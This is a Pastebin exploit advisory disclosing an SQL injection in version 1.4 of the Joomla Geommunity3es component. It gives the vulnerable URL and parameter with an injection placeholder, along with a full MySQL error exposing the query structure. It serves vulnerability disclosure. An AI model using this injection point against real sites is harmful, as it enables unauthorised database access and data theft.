KingSkrupellos

Joomla Geommunity3es Components 1.4 SQL Injection

Feb 24th, 2019
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.37 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla Geommunity3es Components 1.4 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/02/2019
  7. # Vendor Homepage : nordmograph.com
  8. # Software Download Link : nordmograph.com/extensions
  9. /index.php?option=com_virtuemart&view=productdetails
  10. &virtuemart_product_id=142&virtuemart_category_id=7&Itemid=58
  11. # Software Information Link : extensions.joomla.org/extension/geommunity/
  12. # Software Affected Version : 1.4
  13. # Software Price : Paid download - 10 Euro
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Exploit Risk : Medium
  17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  18. Special Elements used in an SQL Command ('SQL Injection') ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. Geommunity3 (for any located Joomla & 3rd party content) is the host component
  28.  
  29. to locate, on AJAX Google Maps, all your Joomla 3rd party extensions content via plugins.
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. ***********
  35. Joomla Geommunity3es Components 1.4 component for Joomla is prone to an SQL-injection
  36.  
  37. vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  38.  
  39. Exploiting this issue could allow an attacker to compromise the application, access
  40.  
  41. or modify data, or exploit latent vulnerabilities in the underlying database.
  42.  
  43. A remote attacker can send a specially crafted request to the vulnerable application and
  44.  
  45. execute arbitrary SQL commands in application`s database.
  46.  
  47. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  48.  
  49. An attacker can exploit this issue using a browser.
  50.  
  51. ####################################################################
  52.  
  53. # SQL Injection Exploit :
  54. **********************
  55. /index.php/component/geommunity3es/?view=videomarkers&format=json
  56.  
  57. /index.php/component/geommunity3es/?view=videomarkers&format=[SQL Injection]
  58.  
  59. ####################################################################
  60.  
  61. # Example SQL Database Error :
  62. ****************************
  63. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your
  64. MySQL server version for the right syntax to use near 'AND ) AND ( longitude
  65. BETWEEN AND 180 OR longitude BETWEEN -180 AND )' at line 8 SQL=SELECT
  66. sa.id , sa.title , sl.latitude, sl.longitude , spi.value AS privacy_value FROM #__social_albums
  67. sa JOIN #__social_locations sl ON sl.uid = sa.id LEFT JOIN #__social_privacy_items spi
  68. ON spi.uid = sa.id AND spi.type='albums' AND spi.user_id = sa.user_id WHERE
  69. sl.type='albums' AND (spi.value='0' OR spi.value IS NULL) HAVING sl.latitude
  70. !='' AND sl.longitude !='' AND latitude !='0' AND longitude !='0' AND
  71. ( latitude BETWEEN AND ) AND ( longitude BETWEEN AND 180
  72. OR longitude BETWEEN -180 AND )
  73.  
  74. ####################################################################
  75.  
  76. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  77.  
  78. ####################################################################
Add Comment
Please, Sign In to add comment